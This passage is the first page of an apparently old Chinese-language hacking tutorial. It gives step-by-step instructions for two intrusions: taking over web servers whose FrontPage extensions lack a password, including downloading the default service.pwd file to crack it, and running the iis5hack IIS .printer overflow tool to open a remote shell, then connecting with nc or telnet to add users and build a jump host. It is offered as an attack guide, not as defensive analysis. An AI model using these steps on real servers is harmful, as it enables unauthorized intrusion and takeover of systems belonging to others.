第一，努力提高权限

第二，由于cmd的限制，我们可以做的不多，那就要程序帮忙，上传吧！切记，要隐秘！
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

一，frontpage扩展攻击。

为什么把它放第一位呢？原因很简单，它最最方便，frontpage服务器扩展是一种方便的远程站点管理功能，可是由于某些网管白痴的疏忽（为什么白痴满街飞？）不设置访问密码，如果那样的话，我们只要用一个frontpage就可以黑它了！！这完全不是黑客工具，但它确实办到了，还要感谢白痴网管和微软啊！

具体做法：

1，准备frontpage，我是用dreamweaver的，但它不能黑啊：）最好是2000版，只是不要是老掉牙的版本就行了。

2，找一台有frontpage扩展的主机，可以用流光，也可以用搜索引擎查找/_vti_pvt/，这是frontpage扩展的标志。

3，接下来打开frontpage,(妈妈：你在干什么？回答：做网页！妈妈：好孩子！^_^）文件菜单下选择“打开站点”，然后在文件夹框里写入http://11.11.22.22（我习惯用这个做例子，以fp2000为准）注意http://不要漏掉。在按下“打开”按钮前，不要忘了祈祷：）一两秒后，出现了文件夹，好啊！成功了，现在就可以操作网页文件了。

4，万一跳出错误信息，表示有密码（这个不算白痴）这时我们试着用以下url,http://11.11.22.22/_vti_pvt/service.pwd,这是默认的密码文件，下载下来，应该是unix的加密，找个解密器破密码吧！运气好的话还可以改网页。

我的看法：

这个漏洞只能说明网管的疏忽，对我们而言是没有什么利用价值的，只可以改改网页，也许这也够了，但要进一步控制主机，此漏洞就无能为力。消遣时可以玩玩。

二，iis.printer溢出攻击

据说缓冲区溢出攻击是黑客入侵时70%所选的方法，看起来有点夸张，但确实有道理，因为暴力密码破解在网络上变得非常之慢，而像unicode的解码漏洞所取得的权限又太低，而缓冲区溢出一般可取得system权限，是非常有用的！

具体原理我也不是很清楚，只能说个大概：当我们向系统发出超出缓冲区大小的数据处理请求时，便会引发溢出，并弹出错误对话框，我们常看到的“非法操作”其实也是可能是由于溢出。而当溢出时，eip发生错误，有汇编知识的朋友应该记得，eip是控制执行代码的位置（顺便问一下，有没有会crack的高人，记得做我老师）这时加入一段恶性代码，算好发生溢出时的eip值，这样溢出时就会执行恶性代码而不是当掉。非法操作我们知道多的不得了，因此……溢出攻击是非常强大的！

由于汇编对于我们来说较难掌握，加之对溢出的了解很有限，那么我们只能借助高手们的程序来黑了。

具体方法：

1，准备iishack，本站有下载，该版本可以对多种系统进行攻击。

2，用x-scan或流光扫描一个有iis.printer漏洞的主机，然后就可以攻击了。

3，在命令行方式执行iis5hack (主机ip) (端口号，默认80）（系统代号，具体可参考程序的说明）（ shell口）

例如：iis5hack 11.11.22.22 80 1 111(以为在111端口开一个shell)

4,用nc或telnet连上，nc/telnet 11.11.22.22 111,成功的话就可以控制机器了，加个用户，做个代理……

我的看法：

这算是一个比较有用的漏洞了，它能帮助我们取得system权限，其实和admin差不了多少了，对于做一台跳板是非常有利的，希望大家熟练掌握。

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  ... 下一页  >>